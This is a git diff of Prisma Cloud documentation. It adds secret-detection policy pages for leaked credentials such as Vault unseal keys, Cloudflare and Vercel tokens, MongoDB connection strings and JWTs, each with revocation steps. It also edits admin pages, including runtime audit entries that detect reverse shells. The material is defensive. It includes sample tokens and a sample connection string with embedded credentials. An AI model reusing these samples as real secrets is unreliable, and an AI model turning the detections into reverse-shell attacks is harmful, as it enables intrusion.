+ + +=== Description + + +To use the Typeform Create, Responses, and Webhooks APIs, you need to pass your personal access token in the Authorization header of your requests. +Access tokens are long strings of random characters that look something like this: tfp_943af478d3ff3d4d760020c11af102b79c440513. +The access token is unique per developer. +It is used to identify a given user and make sure that only you can access your typeforms and results. + +=== Fix - Buildtime + + +*Typeform* + + + +. Log in to your account at Typeform. + +. In the upper-left corner, in the drop-down menu next to your username, click Account. + +. In the left menu, click Personal tokens or here. + +. Identify the token you want to delete. + +. Click ..., the three dots button in the right-side of the list. + +. Click Delete this token. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71.adoc new file mode 100644 index 000000000..582e53a1c --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71.adoc @@ -0,0 +1,50 @@ +== Vault Unseal Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d29f067e-31c9-44a2-b4e0-90a25b8595e1 + +|Checkov Check ID +|CKV_SECRET_71 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +When a Vault server is started, it starts in a sealed state. +In this state, Vault is configured to know where and how to access the physical storage, but doesn't know how to decrypt any of it. +Unsealing is the process of obtaining the plaintext root key necessary to read the decryption key to decrypt the data, allowing access to the Vault. + +=== Fix - Buildtime + + +*Vault* + + + +. Revoke the key + +. Connect to Vault + +. Run `vault operator key revoke` followed by the number, such as `vault operator key revoke 2` + +. Verify it was revoked with `vault operator key status` + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72.adoc new file mode 100644 index 000000000..40967b621 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72.adoc @@ -0,0 +1,46 @@ +== Yandex Predictor API key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 063f37de-6e7e-4d1f-8607-36502f9dfeaa + +|Checkov Check ID +|CKV_SECRET_72 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Yandex Predictor is an a machine learning service hosted by Yandex Cloud. +The Yandex Predictor API Key is used to authenticate and authorize access to the API to add machine learning to services. + +=== Fix - Buildtime +*Yandex Cloud* + + +. In Yandex Cloud, go to Access Management + +. Click on API keys + +. Find the API key you want to revoke + +. Click on the three dot icon and select Delete + +. Track usage and set up alerts to spot any abuse of the credential diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73.adoc new file mode 100644 index 000000000..92ab54d28 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73.adoc @@ -0,0 +1,52 @@ +== Cloudflare API Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fbf7538b-dd40-4afe-a27d-81e118980598 + +|Checkov Check ID +|CKV_SECRET_73 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Using the Cloudflare API, requires authentication so that Cloudflare knows who is making requests and what permissions they have. +An API Token can be created to grant access to the API to perform actions. +See creating an API Token for more on this. +When using the Cloudflare API, developers need to authenticate API requests. + +=== Fix - Buildtime + + +*Cloudflare* + + + + +[source,text] +---- +curl -X DELETE \ + +"https://api.cloudflare.com/client/v4/zones//filters?id=&id=" \ +-H "X-Auth-Email: " \ +-H "X-Auth-Key: " +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74.adoc new file mode 100644 index 000000000..033670d74 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74.adoc @@ -0,0 +1,49 @@ +== Vercel API Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0e6cee83-8605-44a0-b53e-8410872d0cea + +|Checkov Check ID +|CKV_SECRET_74 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Vercel Access Tokens are required to authenticate and use the Vercel API. +Tokens can be created and managed inside your account settings, and can be scoped to only allow access for specific Teams. + +=== Fix - Buildtime + + +*Vercel* + + + +. Revoke the key + +. On Vercel, click on the avatar, then Account + +. Click on the API Tokens + +. Find the API Token you want to revoke and click on the trash icon + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75.adoc new file mode 100644 index 000000000..97a9a6c77 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75.adoc @@ -0,0 +1,50 @@ +== Webflow API Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7fc2545b-e320-4d5c-900c-d9218fe286c3 + +|Checkov Check ID +|CKV_SECRET_75 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Webflow CMS API's allow developers to programmatically add, update, and delete items from Collections. +Creating webhooks with the CMS API is gets Webflow to "talk" to third party applications. +It lets developers programmatically add, update, and delete items from your Collections. + +=== Fix - Buildtime + + +*Webflow* + + + +. Revoke the token + +. Go to Webflow, click on your avatar + +. Click on the API Tokens tab + +. Find the token to revoke and click on the trash icon + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76.adoc new file mode 100644 index 000000000..e9793f6fa --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76.adoc @@ -0,0 +1,50 @@ +== Scalr API Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6e65aa0b-c144-476e-90c4-1a8d1cd9e725 + +|Checkov Check ID +|CKV_SECRET_76 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Scalr is a remote operations backend for Terraform. +It executes Terraform operations and stores state, regardless of the workflow, in Scalr itself allowing for easy collaboration across your organization. +That means you can easily onboard an existing GitOps or native Terraform CLI based workflows into Scalr with little to no modification to your actual code. + +=== Fix - Buildtime + + +*Scalr* + + + +. Revoke the token + +. Go to Scalr, click on Account + +. Click on API Tokens + +. Find the token to revoke and click on the trash icon + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77.adoc new file mode 100644 index 000000000..165d14230 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77.adoc @@ -0,0 +1,44 @@ +== MongoDB Connection String + + +=== Description + +MongoDB is a document-oriented database program. +This policy detects MongoDB credentials in the form of URI connection strings. +Example: + + +[source,text] +---- +{ + "var mongo_uri = "mongodb+srv://testuser:hub24aoeu@gg-is-awesome-gg273.mongodb.net/test?retryWrites=true&w=majority"", +} +---- + + +=== Fix - Buildtime + + +*MongoDB Revoking a MongoDB connection string means invalidating or disabling the credentials used to connect to a MongoDB instance.* + + +This can be done in several ways depending on the method used to authenticate and the specific setup of your MongoDB environment. +If you're using MongoDB's built-in authentication mechanism, you can revoke a connection string by revoking the user's privileges. +This can be done using the following steps: + +. Connect to the MongoDB instance using a user account with administrative privileges. + +. Use the db.revokeRolesFromUser() command to remove the user's roles. ++ +For example, if the user's name is myUser and they have the readWrite role on the myDatabase database, you would run the following command: ++ +[,php] +---- +db.revokeRolesFromUser("myUser", [{role: "readWrite", db: "myDatabase"}]) +---- + +. Alternatively, you can also use the db.dropUser() command to completely delete the user account. +If you're using an external authentication mechanism, such as LDAP or Kerberos, you'll need to consult the documentation for that mechanism to find out how to revoke credentials. +It's worth noting that revoking a connection string is only effective for future connections. +Any existing connections will remain valid until they are closed or expire. +If you need to immediately terminate all active connections, you can restart the MongoDB instance or use the db.killOp() command to kill specific operations. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8.adoc new file mode 100644 index 000000000..bd43dcbb6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8.adoc @@ -0,0 +1,49 @@ +== IBM COS HMAC Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 27e72b60-3741-4aed-8854-470fffaac08f + +|Checkov Check ID +|CKV_SECRET_8 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +IBM Cloud object storage (COS) is a format for storing unstructured data in the cloud. +HMAC credentials consist of an Access Key and Secret Key paired for use with S3-compatible tools and libraries that require authentication. +The IBM Cloud Object Storage API is a REST-based API for reading and writing objects. +It uses IBM Cloud Identity and Access Management for authentication and authorization, and supports a subset of the S3 API for easy migration of applications to IBM Cloud. + +=== Fix - Buildtime + + +*IBM Cloud* + + + +. Revoke the exposed secret. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Check IBM Cloud Object Storage Accesser server logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9.adoc new file mode 100644 index 000000000..3365ba57f --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9.adoc @@ -0,0 +1,50 @@ +== JSON Web Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2d5ee856-a20a-4262-8c55-d60c09a33068 + +|Checkov Check ID +|CKV_SECRET_9 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties. +Once issued, access tokens and ID tokens cannot be revoked in the same way as cookies with session IDs for server-side sessions. +As a result, tokens should be issued for relatively short periods, and then refreshed periodically if the user remains active. + +=== Fix - Buildtime + + +*Multiple Services* + + + +. Reduce duration. ++ +The most common solution is to reduce the duration of the JWT and revoke the refresh token so that the user can't generate a new JWT. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Check your application access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/secrets-policy-index.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/secrets-policy-index.adoc new file mode 100644 index 000000000..62ff0f7fb --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/secrets-policy-index.adoc @@ -0,0 +1,388 @@ +== Secrets Policy Index + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-repository-is-private.adoc[GitHub repository is not Private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/PrivateRepo.py[CKV_GIT_1] +|LOW + + +|xref:git-secrets-1.adoc[Artifactory Credentials] +|[CKV_SECRET_1] +|LOW + + +|xref:git-secrets-11.adoc[Mailchimp Access Key] +|CKV_SECRET_11 +|LOW + + +|xref:git-secrets-12.adoc[NPM Token] +|CKV_SECRET_12 +|LOW + + +|xref:git-secrets-13.adoc[Private Key] +|CKV_SECRET_13 +|LOW + + +|xref:git-secrets-14.adoc[Slack Token] +|CKV_SECRET_14 +|LOW + + +|xref:git-secrets-15.adoc[SoftLayer Credentials] +|CKV_SECRET_15 +|LOW + + +|xref:git-secrets-16.adoc[Square OAuth Secret] +|CKV_SECRET_16 +|LOW + + +|xref:git-secrets-17.adoc[Stripe Access Key] +|CKV_SECRET_17 +|LOW + + +|xref:git-secrets-18.adoc[Twilio Access Key] +|CKV_SECRET_18 +|LOW + + +|xref:git-secrets-19.adoc[Hex High Entropy String] +|CKV_SECRET_19 +|LOW + + +|xref:git-secrets-2.adoc[AWS Access Keys] +|CKV_SECRET_2 +|LOW + + +|xref:git-secrets-21.adoc[Airtable API Key] +|CKV_SECRET_21 +|LOW + + +|xref:git-secrets-22.adoc[Algolia Key] +|CKV_SECRET_22 +|LOW + + +|xref:git-secrets-23.adoc[Alibaba Cloud Keys] +|CKV_SECRET_23 +|LOW + + +|xref:git-secrets-24.adoc[Asana Key] +|CKV_SECRET_24 +|LOW + + +|xref:git-secrets-25.adoc[Atlassian Oauth2 Keys] +|CKV_SECRET_25 +|LOW + + +|xref:git-secrets-26.adoc[Auth0 Keys] +|CKV_SECRET_26 +|LOW + + +|xref:git-secrets-27.adoc[Bitbucket Keys] +|CKV_SECRET_27 +|LOW + + +|xref:git-secrets-28.adoc[Buildkite Agent Token] +|CKV_SECRET_28 +|LOW + + +|xref:git-secrets-29.adoc[CircleCI Personal Token] +|CKV_SECRET_29 +|LOW + + +|xref:git-secrets-3.adoc[Azure Storage Account Access Keys] +|CKV_SECRET_3 +|LOW + + +|xref:git-secrets-30.adoc[Codecov API key] +|CKV_SECRET_30 +|LOW + + +|xref:git-secrets-31.adoc[Coinbase Keys] +|CKV_SECRET_31 +|LOW + + +|xref:git-secrets-32.adoc[Confluent Keys] +|CKV_SECRET_32 +|LOW + + +|xref:git-secrets-33.adoc[Databricks Authentication Token] +|CKV_SECRET_33 +|LOW + + +|xref:git-secrets-34.adoc[DigitalOcean Token] +|CKV_SECRET_34 +|LOW + + +|xref:git-secrets-35.adoc[Discord Token] +|CKV_SECRET_35 +|LOW + + +|xref:git-secrets-36.adoc[Doppler API Key] +|CKV_SECRET_36 +|LOW + + +|xref:git-secrets-37.adoc[DroneCI Token] +|CKV_SECRET_37 +|LOW + + +|xref:git-secrets-38.adoc[Dropbox App Credentials] +|CKV_SECRET_38 +|LOW + + +|xref:git-secrets-39.adoc[Dynatrace token] +|CKV_SECRET_39 +|LOW + + +|xref:git-secrets-4.adoc[Basic Auth Credentials] +|CKV_SECRET_4 +|LOW + + +|xref:git-secrets-40.adoc[Elastic Email Key] +|CKV_SECRET_40 +|LOW + + +|xref:git-secrets-41.adoc[Fastly Personal Token] +|CKV_SECRET_41 +|LOW + + +|xref:git-secrets-42.adoc[FullStory API Key] +|CKV_SECRET_42 +|LOW + + +|xref:git-secrets-43.adoc[GitHub Token] +|CKV_SECRET_43 +|LOW + + +|xref:git-secrets-44.adoc[GitLab Token] +|CKV_SECRET_44 +|LOW + + +|xref:git-secrets-45.adoc[Google Cloud Keys] +|CKV_SECRET_45 +|LOW + + +|xref:git-secrets-46.adoc[Grafana Token] +|CKV_SECRET_46 +|LOW + + +|xref:git-secrets-47.adoc[Terraform Cloud API Token] +|CKV_SECRET_47 +|LOW + + +|xref:git-secrets-48.adoc[Heroku Platform Key] +|CKV_SECRET_48 +|LOW + + +|xref:git-secrets-49.adoc[HubSpot API Key] +|CKV_SECRET_49 +|LOW + + +|xref:git-secrets-5.adoc[Cloudant Credentials] +|CKV_SECRET_5 +|LOW + + +|xref:git-secrets-50.adoc[Intercom Access Token] +|CKV_SECRET_50 +|LOW + + +|xref:git-secrets-51.adoc[Jira Token] +|CKV_SECRET_51 +|LOW + + +|xref:git-secrets-52.adoc[LaunchDarkly Personal Token] +|CKV_SECRET_52 +|LOW + + +|xref:git-secrets-53.adoc[Netlify Token] +|CKV_SECRET_53 +|LOW + + +|xref:git-secrets-54.adoc[New Relic Key] +|CKV_SECRET_54 +|LOW + + +|xref:git-secrets-55.adoc[Notion Integration Token] +|CKV_SECRET_55 +|LOW + + +|xref:git-secrets-56.adoc[Okta Token] +|CKV_SECRET_56 +|LOW + + +|xref:git-secrets-57.adoc[PagerDuty Authorization Token] +|CKV_SECRET_57 +|LOW + + +|xref:git-secrets-58.adoc[PlanetScale Token] +|CKV_SECRET_58 +|LOW + + +|xref:git-secrets-59.adoc[Postman API Key] +|CKV_SECRET_59 +|LOW + + +|xref:git-secrets-6.adoc[Base64 High Entropy Strings] +|CKV_SECRET_6 +|LOW + + +|xref:git-secrets-60.adoc[Pulumi Access Token] +|CKV_SECRET_60 +|LOW + + +|xref:git-secrets-61.adoc[Python Package Index Key] +|CKV_SECRET_61 +|LOW + + +|xref:git-secrets-62.adoc[RapidAPI Key] +|CKV_SECRET_62 +|LOW + + +|xref:git-secrets-63.adoc[Readme API Key] +|CKV_SECRET_63 +|LOW + + +|xref:git-secrets-64.adoc[RubyGems API Key] +|CKV_SECRET_64 +|LOW + + +|xref:git-secrets-65.adoc[Sentry Token] +|CKV_SECRET_65 +|LOW + + +|xref:git-secrets-66.adoc[Splunk User Credentials] +|CKV_SECRET_66 +|LOW + + +|xref:git-secrets-67.adoc[Sumo Logic Keys] +|CKV_SECRET_67 +|LOW + + +|xref:git-secrets-68.adoc[Telegram Bot Token] +|CKV_SECRET_68 +|LOW + + +|xref:git-secrets-69.adoc[Travis Personal Token] +|CKV_SECRET_69 +|LOW + + +|xref:git-secrets-7.adoc[IBM Cloud IAM Key] +|CKV_SECRET_7 +|LOW + + +|xref:git-secrets-70.adoc[Typeform API Token] +|CKV_SECRET_70 +|LOW + + +|xref:git-secrets-71.adoc[Vault Unseal Key] +|CKV_SECRET_71 +|LOW + + +|xref:git-secrets-72.adoc[Yandex Predictor API key] +|CKV_SECRET_72 +|LOW + + +|xref:git-secrets-73.adoc[Cloudflare API Credentials] +|CKV_SECRET_73 +|LOW + + +|xref:git-secrets-74.adoc[Vercel API Token] +|CKV_SECRET_74 +|LOW + + +|xref:git-secrets-75.adoc[Webflow API Token] +|CKV_SECRET_75 +|LOW + + +|xref:git-secrets-76.adoc[Scalr API Token] +|CKV_SECRET_76 +|LOW + + +|xref:git-secrets-77.adoc[MongoDB Connection String] +|Not Supported +| + + +|xref:git-secrets-8.adoc[IBM COS HMAC Credentials] +|CKV_SECRET_8 +|LOW + +|xref:git-secrets-9.adoc[JSON Web Token] +|CKV_SECRET_9 +|LOW + + +|=== + diff --git a/compute/admin_guide/api/api.adoc b/compute/admin_guide/api/api.adoc index 44356bba4..e54667412 100644 --- a/compute/admin_guide/api/api.adoc +++ b/compute/admin_guide/api/api.adoc @@ -2,10 +2,16 @@ All information for the CWPP API has now moved to https://pan.dev[pan.dev], our home for developer docs. -*API reference:* - +ifdef::compute_edition[] +* *Prisma Cloud Compute Edition API reference* ++ https://pan.dev/compute/api/ +endif::compute_edition[] -*API-related documentation, including the porting guide:* - -https://pan.dev/docs/prisma-cloud/docs/ +ifdef::prisma_cloud[] +* *Prisma Cloud Enterprise Edition API reference* ++ +https://pan.dev/prisma-cloud/api/cwpp/ +* *API workflows* +https://pan.dev/prisma-cloud/docs/ +endif::prisma_cloud[] diff --git a/compute/admin_guide/runtime_defense/runtime_audits.adoc b/compute/admin_guide/runtime_defense/runtime_audits.adoc index b94d73690..904c79dee 100644 --- a/compute/admin_guide/runtime_defense/runtime_audits.adoc +++ b/compute/admin_guide/runtime_defense/runtime_audits.adoc @@ -110,14 +110,14 @@ Hosts * Enable and disable this detection via the *Reverse shell attacks* toggle, under the Runtime rule Processes / Anti-malware tab. * Avoid audits on specific known and allowed processes, by adding process names to the runtime rules processes *Allowed* list. -| is a reverse shell . Full command: +| is a reverse shell. Full command: |xref:incident_types/reverse_shell.adoc[Reverse shell] | Containers, Hosts |Suid Binaries -|Indicates that a process is running with high priviliges, by watching for binaries with the setuid bit that are executed. +|Indicates that a process is running with high privileges, by watching for binaries with the setuid bit that are executed. * Enable and disable this detection via the *Processes started with SUID* toggle, under the Runtime rule Processes tab. @@ -325,7 +325,7 @@ Hosts |Explicitly Denied Listening Port |Indicates a container process is listening on a port that is explicitly listed in the *Listening ports* list, under *Denied & fallback*. -For App-embedded and Serverless, this indicates ports that are not listed in the Allowed Listening ports list. +For App-embedded, this indicates ports that are not listed in the Allowed Listening ports list, or they are on the denied list. |Process is listening on port explicitly denied by a runtime rule @@ -338,7 +338,7 @@ App-embedded |Explicitly Denied Outbound Port |Indicates a container process uses an outbound port that is explicitly listed in the *Outbound internet ports* list under *Denied & fallback*. -For App-embedded and Serverless, this indicates ports that are not listed in the *Outbound ports* list under *Allowed*. +For App-embedded, this indicates ports that are not listed in the *Outbound ports* list under *Allowed*, or they are on the denied list. |Outbound connection to port (IP: ) is explicitly denied by a runtime rule. @@ -425,7 +425,7 @@ Containers, App-Embedded |SSH Access -|Indicates that a ssh config file was accessed +|Indicates that an ssh config file was accessed * Enable and disable this detection via the *Changes to SSH and admin account configuration files* toggle, under the Container/App-Embedded Runtime rule's File system tab. * To ignore such a detection for a known and allowed process, create a Runtime custom rule that allows these file changes by a specific process. @@ -537,7 +537,7 @@ App-Embedded To enable or disable WildFire: * Open the *Manage > system > WildFire* page and configure the desired settings -* Open the Runtime rule for Containers, Hosts, or App-Embedded, and enable/disable the *Use WildFire malware analysis*, under the Anti-malware tab +* Open the Runtime rule for Containers, Hosts, or App-Embedded, and enable/disable *Use WildFire malware analysis*. For Container/Host policy, this option is available under *Anti-malware* tab and for App-Embedded policy it's available under *File system* tab. |Process created the file with MD5 . The file created was detected as malicious. Report URL: |xref:incident_types/malware.adoc[Malware] diff --git a/compute/admin_guide/upgrade/support_lifecycle.adoc b/compute/admin_guide/upgrade/support_lifecycle.adoc index 5b9deafcc..30c595db3 100644 --- a/compute/admin_guide/upgrade/support_lifecycle.adoc +++ b/compute/admin_guide/upgrade/support_lifecycle.adoc @@ -9,18 +9,18 @@ With this capability, you have a larger window to plan upgrades for connected co Any supported version of Defender, twistcli, and the Jenkins plugin can connect to Console. Prisma Cloud supports the latest release and the previous two releases (n, n-1, and n-2). -*There are some exceptions to this policy as we roll out this new capability.* +*There are some exceptions to this policy as explained here.* For Defenders: * 21.08 supports n and n-1 (21.04) only. -* Starting with the next release (Joule), there will be full support for n, n-1, and n-2. +* 22.01 and later supports n, n-1, and n-2. For twistcli and the Jenkins plugin: * 21.08 supports itself (n) only. -* In the next release (Joule), Console will support n and n-1. -* In release after Joule (Kepler), Console will support n, n-1, n-2. +* 22.01 (Joule), Console support is for n and n-1. +* 22.06 and later (Kepler and later), Console support is for n, n-1, n-2. For example, if Console runs version 21.12, it will support Defenders, twistcli, and the Jenkins plugin running either version 21.08 or 21.04: diff --git a/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png b/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png index 6b2746e06..08e7451f8 100644 Binary files a/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png and b/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png differ diff --git a/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc b/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc index 83331294a..c803be3e5 100644 --- a/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc +++ b/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc @@ -1,25 +1,25 @@ :topic_type: task [.task] [#id61f76ceb-9311-4af0-b3f8-58ff6598c822] -== Integrate Prisma Cloud with AWS Inspector -Learn how to integrate Prisma™ Cloud with AWS Inspector. +== Integrate Prisma Cloud with Amazon Inspector +Learn how to integrate Prisma™ Cloud with Amazon Inspector. -Prisma™ Cloud ingests vulnerability data and security best practices deviations from AWS Inspector to provide organizations with additional context about risks in the cloud. +Prisma™ Cloud ingests vulnerability data and security best practices deviations from Amazon Inspector to provide organizations with additional context about risks in the cloud. +++I wanted to change the next sentence to say “...traffic traveling to (or toward) sensitive workloads...” but not sure that’s right, either. Is a database truly an example of “a sensitive workload?” Can we chat so I can understand this one better?Thanks!+++You can identify suspicious traffic to sensitive workloads, such as databases with known vulnerabilities. [.procedure] -. Enable AWS Inspector on your EC2 instances. To set up AWS Inspector, see https://aws.amazon.com/premiumsupport/knowledge-center/set-up-amazon-inspector/[Amazon documentation]. +. Enable Amazon Inspector on your EC2 instances. To set up Amazon Inspector, see https://aws.amazon.com/premiumsupport/knowledge-center/set-up-amazon-inspector/[Amazon documentation]. -. Enable read-access permissions to AWS Inspector on the IAM Role policy. +. Enable read-access permissions to Amazon Inspector on the IAM Role policy. + The Prisma Cloud IAM Role policy that you use to onboard your AWS setup needs these permissions: + -screen:[inspector:Describe*, ] screen:[inspector:List*]If you used the CFT templates to onboard your AWS account, the Prisma Cloud IAM Role policy already has the permissions required for AWS Inspector. +screen:[inspector:Describe*, ] screen:[inspector:List*]If you used the CFT templates to onboard your AWS account, the Prisma Cloud IAM Role policy already has the permissions required for Amazon Inspector. -. After the Prisma Cloud service begins ingesting AWS Inspector data, you can use the following RQL queries for visibility into the host vulnerability information collected from AWS Inspector. +. After the Prisma Cloud service begins ingesting Amazon Inspector data, you can use the following RQL queries for visibility into the host vulnerability information collected from it. + image::inspector-query-on-prisma-cloud.png[scale=40] + diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc index 921f1d7cc..a7e04a982 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc @@ -47,6 +47,9 @@ View the list of all cloud regions supported on Prisma Cloud. |ap-south-1 |AWS Mumbai +|ap-south-2 +|AWS Hyderabad + |ap-southeast-1 |AWS Singapore diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc index 8784bafe4..8bea17a16 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc @@ -3,7 +3,7 @@ == Configure Vulnerability Findings -Prisma Cloud ingests findings and vulnerability data from AWS GuardDuty and Inspector, which you can use to build more meaningful insights and for vulnerability management of potentially compromised resources. Once you enable malware protection and configure it on Prisma Cloud, if malware is detected during a scan, an additional finding is generated that you can view on Prisma Cloud Resource page. +Prisma Cloud ingests findings and vulnerability data from Amazon GuardDuty and Inspector, which you can use to build more meaningful insights and for vulnerability management of potentially compromised resources. Once you enable malware protection and configure it on Prisma Cloud, if malware is detected during a scan, an additional finding is generated that you can view on Prisma Cloud Resource page. [NOTE] ==== diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc index 86e70e420..ba2f6ae78 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc @@ -37,19 +37,19 @@ image::oci-tenant-console-1.png[scale=40] .. Return to the Prisma Cloud Onboarding Setup page and paste the OCID in the *Tenant/Root OCID* field. -.. Select the *Home Region* where the tenant is created (for example, us-phoenix-1). +.. Select the *Home Region* where the tenant is created (for example, us-phoenix-1) and click *Next*. -.. On clicking *Next* and following the steps listed in *Create a User to Enable Access*, a new user, group, and policy that correspond to OCI Identity User Name, Group Name, and Policy Name will be created. +.. Follow the steps in xref:id5ac2883d-d1ed-44a3-bd63-cc3fabedf477/create-a-user[Create a User to Enable Access], to create a new user, group, and policy that correspond to OCI Identity User Name, Group Name, and Policy Name. + [NOTE] ==== -You can use an existing user with the correct privileges, an existing group, and an existing policy with the correct policy statements. However, it is recommended that you create a new user, group, and policy as described in *Create a User to Enable Access*. +You can use an existing user with the correct privileges, an existing group, and an existing policy with the correct policy statements. However, it is recommended that you create a new user, group, and policy as described in xref:id5ac2883d-d1ed-44a3-bd63-cc3fabedf477/create-a-user[Create a User to Enable Access] ==== + image::oci-onboard-setup-2.png[scale=40] -. *Create a User to Enable Access* +. [[create-a-user]]*Create a User to Enable Access* + Use the Terraform template to generate a new user OCID. The User Name, Group Name, and Policy Name must be unique and should not be present in your OCI tenant. + @@ -61,11 +61,6 @@ To onboard the Oracle Cloud account, a public key is needed to access the OCI AP ==== + image::oci-onboard-setup-6.png[scale=40] -+ -//RLP-88811 -*OCI has a limit of 50 policy statements. However, Prisma Cloud supports more than 100 policy statements and contains 56 policy statements in the Terraform file. To successfully ingest the necessary OCI APIs, request a https://docs.oracle.com/en-us/iaas/Content/General/Concepts/servicelimits.htm#[service limit increase] on the policy statements before running the Terraform file. This change affects monthly or annual universal credits OCI accounts and pay-as-you-go or promo OCI accounts.* -+ -*After receiving the service limit increase on the policy statements, you can manually add the remaining permissions to the Terraform file. For the remaining permissions, see https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/oci-permissions.txt#[OCI Permissions].* .. Check the OCI console to see if the *Primary email address required* checkbox is disabled. @@ -196,7 +191,7 @@ 